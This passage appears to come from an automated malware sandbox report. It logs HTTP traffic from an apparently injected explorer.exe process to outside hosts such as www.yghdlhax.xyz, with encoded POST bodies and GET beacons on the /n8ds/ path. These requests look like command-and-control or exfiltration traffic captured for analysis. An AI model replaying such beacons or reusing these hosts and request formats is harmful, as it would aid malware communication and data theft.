                                                                                                                                                    Data Raw: 6c 5a 4f 44 3d 31 6a 59 6e 75 6e 61 33 66 6a 68 6a 68 59 45 73 67 77 34 72 68 47 6d 31 55 33 30 42 57 58 73 41 56 61 59 4c 4e 4f 4b 69 28 5a 6b 34 75 50 4f 33 47 4f 79 53 33 71 51 47 70 45 74 78 5a 64 7a 73 55 4e 72 61 49 45 44 39 33 59 64 74 6d 37 45 61 74 47 58 74 58 48 42 52 4d 46 65 68 47 49 6b 37 34 4d 61 77 49 47 73 4f 75 38 42 4a 52 4a 4a 2d 72 4b 5a 75 47 66 47 49 74 46 54 32 6e 77 79 35 30 41 6d 38 7e 48 4d 79 35 43 6b 58 75 4f 62 6c 43 6e 44 37 69 69 70 5f 51 30 77 48 4d 44 69 6b 69 31 39 68 7a 49 72 30 62 6a 6c 37 51 35 37 48 6f 44 6d 61 61 72 77 45 6a 72 70 38 6a 34 49 57 6f 6b 52 32 7a 5a 67 4e 6b 67 38 72 55 49 46 43 6f 79 57 44 55 36 4c 4e 37 38 62 38 7e 70 4a 69 50 71 57 6e 31 63 38 4a 53 42 38 68 50 42 74 74 37 4f 42 36 38 41 57 57 79 4f 53 78 54 70 56 4c 4d 53 58 37 49 46 52 6d 6b 51 45 41 73 54 6b 48 43 78 36 4d 4b 6c 6d 4e 4c 74 68 4a 33 4b 6f 45 4d 52 67 55 65 46 75 42 4d 4a 31 70 42 36 76 44 4f 74 73 68 69 63 7a 57 7e 31 6e 49 33 47 70 2d 6f 75 4e 47 55 6a 4d 70 50 4a 70 42 78 72 4c 6b 43 4d 53 6e 43 64 74 65 39 50 7e 6b 53 6a 56 52 77 45 63 7a 34 66 4f 72 6f 70 59 6b 78 62 4e 73 46 43 74 58 47 5a 71 68 41 4f 5a 32 34 43 57 4a 36 50 53 70 46 31 69 39 76 37 4e 72 68 4c 74 5f 63 70 47 4b 53 6d 6a 31 69 36 77 56 79 71 70 64 72 65 68 74 5a 52 44 55 52 4b 63 45 66 70 56 36 6f 69 50 51 6b 59 37 2d 65 2d 4d 77 68 36 35 4b 66 4b 4a 5f 68 57 58 61 6b 54 4a 6d 45 74 54 32 35 70 66 53 57 56 63 51 6d 75 46 51 75 7a 61 51 32 75 56 44 6f 67 67 73 57 4f 42 71 41 6b 55 6b 50 30 6c 36 70 73 33 74 6d 56 4e 4c 34 5f 64 76 66 46 65 4d 38 5a 53 54 50 52 74 5f 30 45 35 74 55 77 76 30 76 45 72 36 78 4a 7e 6c 42 2d 78 7a 6d 42 4f 31 69 62 4a 53 4d 46 32 45 77 38 6b 49 6a 4d 4a 74 6b 2d 39 58 65 38 75 30 52 68 55 6b 54 70 33 42 67 4d 36 79 77 33 53 55 57 36 41 35 52 6c 71 66 47 37 68 41 56 67 43 59 53 52 4b 31 37 4d 7a 35 62 68 50 62 72 62 4e 6e 70 4f 4a 79 61 54 49 56 6c 72 68 41 56 54 66 77 69 4e 37 49 28 72 52 67 7e 54 47 76 41 44 75 34 54 56 31 7a 4b 47 38 77 73 4d 33 6f 75 78 77 46 4d 51 68 6c 49 33 49 66 79 4f 55 54 63 5f 4a 45 55 49 78 76 69 4d 28 69 54 31 62 2d 49 4c 47 6c 39 44 42 49 76 49 70 45 42 30 67 58 31 42 62 45 4f 6a 46 4f 76 56 54 4e 34 33 38 59 7a 5f 7e 64 52 74 38 6a 67 4e 31 6e 32 62 6f 7a 6e 38 43 41 79 68 73 4e 43 38 43 49 54 71 70 6e 71 33 39 7a 52 65 70 70 31 6a 6f 71 71 36 36 74 67 35 49 52 30 6a 5a 4e 4c 70 4f 57 50 41 71 48 65 7a 7e 67 4c 68 31 35 37 70 6c 58 35 7a 4b 68 54 53 55 65 68 36 65 49 69 72 28 31 43 43 4e 7a 38 6b 37 34 50 49 46 65 6d 5a 46 42 56 50 54 6d 73 70 78 73 6c 67 75 4a 75 59 49 34 35 62 38 6c 43 36 63 74 77 48 54 6d 4d 43 61 32 48 65 45 4a 70 53 73 77 5a 76 53 6d 38 5a 4c 39 64 4e 42 63 6d 6a 78 69 4e 39 6d 32 6f 6e 76 4e 62 53 4f 65 54 64 61 69 46 79 36 4d 49 61 75 43 28 46 64 35 78 5f 47 67 41 42 61 38 36 38 39 59 50 57 66 4a 58 49 77 56 4a 74 39 59 73 45 4f 79 5a 50 6b 63 71 49 36 61 73 34 63 43 79 32 76 6f 63 6a 6c 6f 4f 52 6f 64 54 7a 53 38 61 6f 36 45 67 4c 6b 70 70 68 57 6f 36 2d 59 44 68 42 52 69 75 53 74 55 37 7a 34 4b 78 4d 4a 61 77 35 4d 4e 56 6b 70 66 38 71 46 32 69 74 4e 47 37 77 47 53 6c 72 57 39 72 6d 62 4d 34 4c 30 4b 61 49 4f 70 30 56 66 2d 71 71 74 4d 51 64 56 2d 62 33 4c 76 4c 4b 39 58 5a 43 46 36 34 33 54 69 6b 6e 79 48 42 71 31 50 4d 74 74 38 55 50 42 71 4d 57 58 79 67 33 75 47 78 76 65 6d 49 6d 37 6b 6e 4f 45 6f 62 54 39 69 65 4c 49 4c 6d 45 7a 37 42 59 7e 57 75 66 55 71 58 43 4b 4b 5a 55 58 70 67 64 61 72 4d 34 67 69 4d 35 41 37 71 45 53 70 59 65 44 35 71 75 72 78 73 54 69 45 55 4d 4b 32 58 44 33 51 35 75 4e 4c 4e 6e 37 71 59 2d 45 78 59 52 53 41 66 6c 67 46 75 6c 44 51 69 59 49 4e 30 67 63 32 28 62 31 48 73 45 4a 49 43 53 6b 64 31 50 6e 47 33 54 74 52 69 6b 69 56 71 69 63 37 6f 6e 4a 76 34 34 33 4e 78 77 45 67 65 75 36 43 6a 62 4e 41 7a 62 34 36 46 4a 32 31 32 55 58 74 65 2d 4c 6b 4a 59 43 30 7e 30 7e 41 31 6a 68 6f 4f 64 30 76 75 36 42 64 43 69 6e 6b 36 44 6f 6c 52 57 61 48 77 4a 37 67 48 79 4e 41 46 38 66 47 65 67 63 58 47 4b 78 34 53 50 4a 5a 4b 59 68 38 6e 75 4a 6a 28 76 64 78 52 30 73 4a 46 71 4e 79 6f 77 78 49 31 55 4c 61 52 61 33 51 31 74
                                                                                                                                                    Data Ascii: lZOD=1jYnuna3fjhjhYEsgw4rhGm1U30BWXsAVaYLNOKi(Zk4uPO3GOyS3qQGpEtxZdzsUNraIED93Ydtm7EatGXtXHBRMFehGIk74MawIGsOu8BJRJJ-rKZuGfGItFT2nwy50Am8~HMy5CkXuOblCnD7iip_Q0wHMDiki19hzIr0bjl7Q57HoDmaarwEjrp8j4IWokR2zZgNkg8rUIFCoyWDU6LN78b8~pJiPqWn1c8JSB8hPBtt7OB68AWWyOSxTpVLMSX7IFRmkQEAsTkHCx6MKlmNLthJ3KoEMRgUeFuBMJ1pB6vDOtshiczW~1nI3Gp-ouNGUjMpPJpBxrLkCMSnCdte9P~kSjVRwEcz4fOropYkxbNsFCtXGZqhAOZ24CWJ6PSpF1i9v7NrhLt_cpGKSmj1i6wVyqpdrehtZRDURKcEfpV6oiPQkY7-e-Mwh65KfKJ_hWXakTJmEtT25pfSWVcQmuFQuzaQ2uVDoggsWOBqAkUkP0l6ps3tmVNL4_dvfFeM8ZSTPRt_0E5tUwv0vEr6xJ~lB-xzmBO1ibJSMF2Ew8kIjMJtk-9Xe8u0RhUkTp3BgM6yw3SUW6A5RlqfG7hAVgCYSRK17Mz5bhPbrbNnpOJyaTIVlrhAVTfwiN7I(rRg~TGvADu4TV1zKG8wsM3ouxwFMQhlI3IfyOUTc_JEUIxviM(iT1b-ILGl9DBIvIpEB0gX1BbEOjFOvVTN438Yz_~dRt8jgN1n2bozn8CAyhsNC8CITqpnq39zRepp1joqq66tg5IR0jZNLpOWPAqHez~gLh157plX5zKhTSUeh6eIir(1CCNz8k74PIFemZFBVPTmspxslguJuYI45b8lC6ctwHTmMCa2HeEJpSswZvSm8ZL9dNBcmjxiN9m2onvNbSOeTdaiFy6MIauC(Fd5x_GgABa8689YPWfJXIwVJt9YsEOyZPkcqI6as4cCy2vocjloORodTzS8ao6EgLkpphWo6-YDhBRiuStU7z4KxMJaw5MNVkpf8qF2itNG7wGSlrW9rmbM4L0KaIOp0Vf-qqtMQdV-b3LvLK9XZCF643TiknyHBq1PMtt8UPBqMWXyg3uGxvemIm7knOEobT9ieLILmEz7BY~WufUqXCKKZUXpgdarM4giM5A7qESpYeD5qurxsTiEUMK2XD3Q5uNLNn7qY-ExYRSAflgFulDQiYIN0gc2(b1HsEJICSkd1PnG3TtRikiVqic7onJv443NxwEgeu6CjbNAzb46FJ212UXte-LkJYC0~0~A1jhoOd0vu6BdCink6DolRWaHwJ7gHyNAF8fGegcXGKx4SPJZKYh8nuJj(vdxR0sJFqNyowxI1ULaRa3Q1tsM4L7H4MUP8sdV2HvSs29jJEXZvLPRik6hrx~G688PinhyIIPfd4bTfZjVVKFl~7r8k5tjjBxmMGH0zKIbfEdd4JGz2HwvDgJIN9Cvt3Rc6OKkmn99OWaUyrMs1bvfstdX5J1AHss60FkQ1FeZqLOdql5TouealWWwOiKSm6UudvVMlwX2a8kzlLvF6LS0fMWicB060rlm~zCMlOkGmupdCo7bdx776lJQlOtTm65TUbMPirWrEH50nFIvFpw6GxpTpXqPE5GXsWLl3-vpU1TSwQEIYfnaqrYgdgdj~urQuz11ocP7YlyBO0g2eOZpIKQaRdgvmhfq0Ya-GU~OpmFTVAYbGHHerqQsR_8R3ihcS1~HwNSVFmO_1D7tr-lGEye7V6asyTUuR89Yzr224Z8WPjn7k02QbyT36F7mZNpOnONMgRGj9YLjSpcl(oiDWpEYHWsehdcBQ6dnLPGOnSzZ33u1nbjAC9ahx0iy5UUD4fbPiwFPebU4MoNEhQhIclMLP6SPdV0C08rpltinalC36KQrmvZ4Y84CP7G6Hzo6zcI9EtWzmL2hgZKyqiaa4q8kMfYjl5o3V7aLTCmQK9~7aBXFGVzaLdc_pTf_l-peijF_9wpKeIg8KOrB4XrLKQplAg(sHBGGvoHvMPOf3Mjy7j3qBjYGeQvD6vJJg6RCGuKDj8L8a5mgd8lJNmvIgPy7WzJNbOl5JPjJpWX-FOpBUM1cGofZzSlR5jr9EfjRf0jyS-~yBr56MNr1HnhohzKXy4KvAmuwkZ3x(9Zl9h5SH6ti8gHAICMl81HomfAT49(CIgB4u6kqZrKJurnt39l9uDvmCX6thh0Br8~DdNOAPGZ2K4K7t9rUp5EH0BV8R3StxOEdzDLoapnFPMJK1cSM8fAum3~_gex
                                                                                                                                                    Nov 29, 2021 14:09:58.819760084 CET6465OUTData Raw: 54 4c 4b 53 6a 68 6b 42 51 76 34 48 42 50 7a 4b 35 55 45 46 76 78 72 4b 4c 35 30 6b 64 56 39 52 38 68 6f 33 70 36 69 79 48 56 43 37 7a 28 75 54 66 78 45 75 78 73 6d 37 6a 35 58 7e 30 69 78 53 6d 68 59 73 59 4c 6a 51 35 53 46 38 6e 6b 37 55 5f 5a
                                                                                                                                                    Data Ascii: TLKSjhkBQv4HBPzK5UEFvxrKL50kdV9R8ho3p6iyHVC7z(uTfxEuxsm7j5X~0ixSmhYsYLjQ5SF8nk7U_ZoVWji15iU(IUvP89l6PaQRiH77EQfGZ9jSdLHrGZcrLmwCCSnxrvstX2xt8NrxEBm316iuI9BOy8YOOpotQKY3X6IVUYI6Q5hsm9IbJhGsLCYF4WgOR(lyU4CS-~67_nInmk8ZKUAHozufxRUJtklYTiTvPwfV0Ga
                                                                                                                                                    Nov 29, 2021 14:09:58.819823027 CET6470OUTData Raw: 64 32 6e 43 52 71 70 35 56 61 61 4a 4d 4d 73 66 38 52 36 34 5f 4e 62 6d 7a 61 43 36 64 43 4d 50 31 47 44 33 30 58 53 72 75 33 4d 51 73 50 6b 70 59 77 4e 61 50 47 30 28 4d 4a 6d 76 67 70 64 77 34 57 64 53 6f 6e 56 46 2d 36 30 4d 69 75 64 4a 37 35
                                                                                                                                                    Data Ascii: d2nCRqp5VaaJMMsf8R64_NbmzaC6dCMP1GD30XSru3MQsPkpYwNaPG0(MJmvgpdw4WdSonVF-60MiudJ75SQRehZb8RfDqlk1Q7HsenCugGkoYcT4TicCzkVMGYaR~GVWFqx5NZj5tMzFrh4zYk6X3_p7phegFIPJf78dBp(CccvuHqmYTeT7xIEFHoapRVf58ByVImsjMWUbaCuVQtqzjPPEauz_ygw6Q2nB33Xfha(llCxVAV
                                                                                                                                                    Nov 29, 2021 14:09:58.829257965 CET6473OUTData Raw: 58 77 75 76 58 57 57 36 50 6a 48 79 79 6b 30 33 61 74 62 55 36 49 79 41 6d 6e 4b 57 6d 6d 6b 56 52 62 67 56 4f 59 4f 67 4f 6b 67 59 34 64 52 62 68 37 79 74 54 28 2d 36 32 6c 48 4d 75 68 57 4f 34 7a 58 48 43 6a 41 69 41 32 45 67 65 69 5f 72 70 71
                                                                                                                                                    Data Ascii: XwuvXWW6PjHyyk03atbU6IyAmnKWmmkVRbgVOYOgOkgY4dRbh7ytT(-62lHMuhWO4zXHCjAiA2Egei_rpq166ufxE3Gc4Kek7lpGcWa40NL5-Knvnk2kIuUDLQsL5hg93fP2h(CZ7aCEAm_ME3uOP2s7HF_WGJZBmhUA4QNVdxHfSvHjRfdAgwGBVm_RL6sNtY1y5orHQ0R21ezdjz3CjWu5ZiWsHX-4sNnUOtbs2tQntRbgD7z
                                                                                                                                                    Nov 29, 2021 14:09:58.829427004 CET6479OUTData Raw: 37 33 75 54 65 4d 30 45 65 4e 31 6b 31 71 66 56 2d 7e 56 43 53 28 55 54 66 4d 53 43 6f 33 58 37 64 36 63 46 66 59 42 33 62 4e 32 56 36 6a 78 70 77 6c 6c 41 66 6e 64 4b 58 70 53 6c 75 36 68 49 4e 47 57 64 68 46 47 5a 57 50 6f 32 57 66 59 6a 37 41
                                                                                                                                                    Data Ascii: 73uTeM0EeN1k1qfV-~VCS(UTfMSCo3X7d6cFfYB3bN2V6jxpwllAfndKXpSlu6hINGWdhFGZWPo2WfYj7ABIjnz7L~f0s8YjQSCeBodyyKMpdrkzHS41etuoD7SvihIQFpFaq1cEaFROofIOTPqmh1quDkG(jOvJpj-b4zRzTlg9_b32I5dfnaiYjUwDpmmFfGlc4UYwdVYuSLXLCPS(gZhGcxQpTSFfeyR4Q4PVVUx5IrVZzT_
                                                                                                                                                    Nov 29, 2021 14:09:58.831584930 CET6482OUTData Raw: 55 56 53 49 62 6c 56 78 34 7e 30 75 61 4a 6a 4b 65 51 6b 52 65 36 5a 50 6a 65 4b 6a 7a 4b 55 6e 76 53 76 71 41 28 7a 71 6d 39 34 54 58 49 4c 6d 4b 48 75 6a 6a 43 78 62 6a 37 45 28 37 70 76 74 36 7e 65 76 72 68 5f 58 67 78 4b 69 70 75 44 46 49 50
                                                                                                                                                    Data Ascii: UVSIblVx4~0uaJjKeQkRe6ZPjeKjzKUnvSvqA(zqm94TXILmKHujjCxbj7E(7pvt6~evrh_XgxKipuDFIP4XI5m2KxHhvoAkC6O0fqWbyskxVzoYiknUfNxWPLEuSyfXG3zWeCKaOEkOUQpNX4HreqvUMtw3CEfOToekEXc(OWOSeu9dv7Jz33432CLft8x3sTE21cM0q8g~AOWAkMLONWgkVcJzeHiMs7dEpfQJTWWZwymDKiH
                                                                                                                                                    Nov 29, 2021 14:09:58.831764936 CET6485OUTData Raw: 48 4c 4e 4f 33 28 6a 63 6b 48 63 59 62 78 51 77 72 50 65 63 34 4e 48 49 65 59 64 69 39 6e 75 65 78 66 39 34 70 56 61 44 78 50 6d 64 71 6d 75 71 78 79 51 75 37 73 35 6d 5a 75 42 69 39 52 48 35 37 37 64 53 63 32 37 6f 36 6d 56 6c 46 72 64 36 70 39
                                                                                                                                                    Data Ascii: HLNO3(jckHcYbxQwrPec4NHIeYdi9nuexf94pVaDxPmdqmuqxyQu7s5mZuBi9RH577dSc27o6mVlFrd6p972plbcBjYIZ1gEBrgwTCJG1gMgQq0XtmoES4GE0oeYFo-5MH7iz5sRKSDp8NP(spQKAfHNjdjsInz7JN73_~ipNpa5uX_2-Ond_QTVYbtMobwpnE2E6dLs7oLSvv0NXrqezAbcfCv3HgzXZJT6II2x8JGzBdxGWk3
                                                                                                                                                    Nov 29, 2021 14:09:58.831907034 CET6495OUTData Raw: 4f 46 67 66 6c 50 67 63 34 57 5a 4b 74 34 36 6d 4b 7a 44 30 6b 58 51 47 7a 46 49 64 56 78 62 75 39 58 69 68 72 32 56 6b 6d 6c 72 7a 55 37 62 57 32 6f 56 4e 4c 75 58 56 46 36 62 75 34 48 78 44 54 55 67 4c 63 6a 58 37 45 43 36 43 6d 56 65 42 7a 74
                                                                                                                                                    Data Ascii: OFgflPgc4WZKt46mKzD0kXQGzFIdVxbu9Xihr2VkmlrzU7bW2oVNLuXVF6bu4HxDTUgLcjX7EC6CmVeBztMVmZLlOnYAFMvojMQVItAFms3yHVpYw5LPkOhGlFDHEyyQ2lszXhKsIswI_cu~KCxJgIfW7Qln7MxjPQwI9OwumkoHb0UTkXABFdHpUKKfaxHFNlAExbKZsJTQd~WBq0j91m1MlM0CGOanOmBUL6KMmpUVKLZp-6q
                                                                                                                                                    Nov 29, 2021 14:09:58.832087040 CET6497OUTData Raw: 31 33 61 4e 61 76 47 73 55 6b 70 74 42 53 7a 4e 71 33 4a 77 44 58 77 74 55 72 75 46 58 7a 4e 50 53 61 70 47 30 4f 77 36 69 59 67 74 63 6b 73 51 74 75 57 33 4e 63 5a 44 4a 30 45 67 33 70 68 76 4c 52 55 72 7a 56 53 68 55 66 71 70 43 67 42 4d 65 48
                                                                                                                                                    Data Ascii: 13aNavGsUkptBSzNq3JwDXwtUruFXzNPSapG0Ow6iYgtcksQtuW3NcZDJ0Eg3phvLRUrzVShUfqpCgBMeHbOC135l0cePHV6guzX4HHQpoQGFidOyI737cJF77GUko5hILGJ_UoqXF1ao5SYD0iGLr72tQqLfm5NcuvrlpjKv4xBhQdnpATz-1-tn(vr6dX(Rsa8P22GsDj6HpOlEOqWMorSBkwOdGxGCLcdEbKKhS1n74Bw_lY
                                                                                                                                                    Nov 29, 2021 14:09:58.840826988 CET6498OUTData Raw: 45 61 63 64 7a 58 74 6b 6e 51 79 4b 48 4e 67 62 6c 58 78 52 4d 41 42 64 42 6d 69 4e 74 59 34 36 71 61 45 4d 65 47 2d 42 4e 6e 45 47 78 78 71 4d 70 59 52 58 42 79 5f 70 42 48 30 68 41 69 32 66 77 53 33 56 38 46 76 4c 55 55 33 39 77 70 39 71 76 44
                                                                                                                                                    Data Ascii: EacdzXtknQyKHNgblXxRMABdBmiNtY46qaEMeG-BNnEGxxqMpYRXBy_pBH0hAi2fwS3V8FvLUU39wp9qvDwhAaASfKGKkbq8Jjvct4xxDnrGtR5tdqAwIWyXpzdU-ElasdkIoW_yUSH79gfZEF9lcsyTdTGbU4SEprfdZAwGYFTRbkmo7lbQB0f2q~pRgpQKfvemBoXpBBwnHx7cjZxnxRdCCTg4QmHpHzdrkrH3tMfA_zysetR
                                                                                                                                                    Nov 29, 2021 14:09:58.842952013 CET6500OUTData Raw: 42 77 56 41 64 31 34 78 54 5a 58 28 55 43 6a 68 36 51 32 6d 2d 62 35 5a 30 49 43 63 4b 6f 39 28 52 59 72 6e 4a 28 45 70 32 51 49 72 42 7a 39 32 59 47 55 53 7a 61 77 6d 5f 49 30 56 63 50 31 7a 47 57 48 58 46 55 6e 6e 69 32 63 35 4d 6b 73 66 38 50
                                                                                                                                                    Data Ascii: BwVAd14xTZX(UCjh6Q2m-b5Z0ICcKo9(RYrnJ(Ep2QIrBz92YGUSzawm_I0VcP1zGWHXFUnni2c5Mksf8P6D_ykNXQsZr14BEN40OUxNgm6qL~Mes92iPgjWdxc6Zddnga_qLI-XCaSQBRgcCvwviUXq8vkgxJPfvc0tZWBcZsFSptgEGm46fKhHQ(mtkwOG_7TQtgwx8ynFBQa2uD_bHVIGEvky-UjpBLHZuzypVDNhSd9mZx4
                                                                                                                                                    Nov 29, 2021 14:09:58.995028973 CET6595INHTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:58 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 154
                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_DoZgPSk10aaiHf3kie/1tYxoMNLDLxmpbn0+w5n3KsKZrXQPAWaITkbhtz7G0bj3OzLqNxbyMokA2LYq0WCz7A
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    21192.168.11.204983234.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:09:58.830039978 CET6479OUTGET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1
                                                                                                                                                    Host: www.mummymotors.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:09:58.937305927 CET6594INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:09:58 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 275
                                                                                                                                                    ETag: "6192576c-113"
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    22192.168.11.2049834192.64.119.25480C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:10:34.554991961 CET6617OUTPOST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.yghdlhax.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.yghdlhax.xyz
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.yghdlhax.xyz/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Data Raw: 6c 5a 4f 44 3d 6d 70 51 74 6e 4b 41 79 4a 31 47 7a 50 4a 67 64 59 66 44 36 35 47 28 49 59 61 31 59 7e 6d 41 50 55 4f 54 35 74 6e 4d 59 6c 47 37 56 63 33 69 50 42 70 53 71 7a 4d 32 74 6e 54 57 6a 62 39 4c 31 7e 47 6f 47 35 4a 70 70 73 43 73 2d 4d 79 51 36 76 6e 74 38 56 47 6b 6f 57 75 44 52 56 4a 52 73 34 54 62 75 6a 47 4a 59 4e 74 6d 78 62 71 7a 63 6b 54 56 38 4e 30 6f 70 36 4a 64 57 51 67 4a 4a 4c 37 4f 54 56 4e 6f 48 68 4b 52 41 55 73 46 6c 57 6e 42 52 79 67 33 50 78 36 31 62 71 45 36 66 43 70 4a 4d 56 67 68 49 36 70 28 66 69 54 6c 71 71 59 4b 39 68 73 63 6c 4f 74 38 63 51 46 47 33 59 35 49 34 71 67 68 56 7a 4f 6b 76 4b 45 7a 61 38 4d 79 4d 68 42 4a 7a 6b 74 31 6d 6c 6d 28 4c 53 30 41 73 47 6d 73 53 4f 66 35 41 39 59 68 38 45 79 4f 34 64 7a 63 5a 46 57 50 75 5a 5a 30 30 6d 78 6b 78 77 41 32 2d 52 4a 4a 57 50 44 39 36 43 45 53 47 55 41 45 66 70 6c 50 73 37 6c 6e 48 30 4a 5a 49 46 42 38 6b 6c 57 78 4f 49 66 69 4b 6b 4c 76 45 4c 75 77 70 42 37 35 62 70 48 4f 35 39 6d 64 72 59 2d 67 72 5a 70 71 4e 74 4a 68 34 6a 2d 4e 59 79 5f 74 58 76 36 4c 4c 67 72 77 74 63 43 38 5f 42 4d 66 6a 51 39 35 67 44 50 39 66 43 6c 7a 62 46 6c 78 31 61 6f 55 57 5a 50 6f 4b 58 2d 4d 64 53 4e 4c 32 42 4c 50 6b 4e 6b 36 41 33 6c 49 47 67 30 76 57 74 6d 6f 71 53 47 65 66 30 62 6e 2d 47 4d 37 66 50 4b 76 4d 69 51 62 72 46 4b 6c 30 58 4f 36 56 31 67 38 45 71 68 76 32 66 6b 72 75 4f 6a 45 34 59 64 76 49 71 71 4e 57 31 66 75 71 4e 52 59 57 77 51 35 65 4c 76 57 54 75 50 42 5f 58 33 72 30 75 41 74 61 39 32 69 62 7e 56 75 55 55 43 6c 59 6f 52 50 73 35 77 4b 45 77 32 34 62 36 38 68 66 51 55 73 52 54 49 28 55 58 6e 28 41 6b 70 62 49 32 46 58 4a 49 38 76 50 54 4f 31 47 50 50 58 4f 56 4f 36 55 4c 79 47 34 47 4c 7a 30 38 71 4a 38 71 6e 6f 6d 55 32 42 67 5a 4e 70 4a 33 66 64 35 31 50 38 38 63 54 4d 77 78 38 4b 74 46 48 51 6a 35 32 56 6e 5a 63 57 7a 75 5f 75 42 35 6d 43 72 36 6a 4d 54 35 56 49 6f 6f 54 39 34 28 79 33 42 6a 6a 78 64 4a 65 4b 49 4b 58 47 36 72 44 32 6b 51 7a 70 35 62 35 53 44 65 61 7e 4c 6b 4d 59 34 50 64 5a 61 69 72 28 2d 64 36 43 6d 4a 6b 5a 64 48 4d 68 61 35 66 48 69 37 76 59 55 31 52 42 6f 42 48 6c 47 34 5f 57 4c 77 4a 75 36 47 44 4a 53 66 46 61 67 58 39 34 62 7a 71 50 42 73 70 4e 55 54 49 6c 66 4b 4a 4d 49 31 31 6c 47 5a 57 50 43 49 47 6b 65 57 4b 6b 4e 6d 52 4e 6b 4a 46 78 6c 39 4a 4f 69 6e 54 71 71 73 50 78 4e 68 62 51 71 46 70 39 6e 43 34 31 38 36 68 67 4a 65 52 36 4f 42 4b 63 67 32 6b 6a 72 47 64 63 45 4b 6f 61 47 34 31 6d 55 51 55 52 5a 51 69 66 63 35 69 57 46 4d 66 4d 44 7a 41 5a 6b 36 67 7a 58 69 46 33 4e 31 70 4c 33 7e 45 6f 33 6d 6f 6a 69 59 54 5a 73 50 65 68 71 34 38 53 76 39 77 58 52 4e 36 32 46 4a 6a 55 41 5a 41 4e 75 4d 31 48 6c 69 66 76 69 4d 6a 6a 4b 32 57 42 78 68 6f 6f 65 61 5a 50 50 31 6e 4e 5f 72 58 30 6b 71 42 53 63 73 34 35 5a 42 36 6f 4c 42 38 4e 37 6a 68 76 46 4d 4f 67 4c 6f 38 47 30 42 4e 77 77 39 70 33 41 51 49 72 4d 57 41 44 6f 43 6e 6a 49 28 6b 4e 56 68 72 77 67 46 30 31 48 32 78 42 36 6d 49 42 50 4b 41 78 62 28 47 6a 68 37 67 45 30 31 6f 52 52 58 65 43 53 4d 64 61 